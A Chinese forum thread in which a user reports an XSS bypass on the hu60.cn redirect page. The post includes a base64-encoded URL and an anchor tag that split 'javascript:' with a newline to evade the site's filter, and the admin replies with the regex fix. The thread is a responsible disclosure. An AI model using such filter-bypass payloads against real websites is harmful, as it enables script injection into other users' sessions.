【虎绿林】的又一处XSS

小杨

@Ta 2021-02-28发布，2021-02-28修改 5292点击

https://hu60.cn/q.php/link.url.html?url64=amF2YVNjDXJpcHQ6YWxlcnQoMTMzNyk=

在跳转页面中，url64为base64编码后的url，老虎对url中以javascript开头的字符串进行了处理，对javascript字符串进行了删除，包含了大小写，但是由于处理不严谨，可使用换行符0x0a进行绕过。

即生成后的链接：
<a href="java
script:alert(1337)">click me</a>

用户点击之后即能触发XSS

隐藏样式查看源码

回复列表(8|隐藏机器人聊天)

1

老虎会游泳

@Ta / 2021-02-28 / 样 / 源
@小杨，已修复。
```
$url = preg_replace('/^\s*j\s*a\s*v\s*a\s*s\s*c\s*r\s*i\s*p\s*t\s*:/is', '', $url);
```
2

TabKey9

@Ta / 2021-02-28 / 样 / 源
3

老子会游泳

@Ta / 2021-02-28 / 样 / 源

已修复
本消息来自粉金版爱欧博客
4

小杨

@Ta / 2021-02-28 / 样 / 源

@老虎会游泳，这
5

小杨

@Ta / 2021-02-28 / 样 / 源

太骚了
6

泰戈尔会游泳

@Ta / 2021-03-01 / 样 / 源
7

大尨

@Ta / 2021-03-02 / 样 / 源
8

小蒋同学

@Ta / 2021-03-03 / 样 / 源

跳转前会展示前往的链接，没什么太大影响。
huawei mate 20pro

添加新回复

回复需要登录。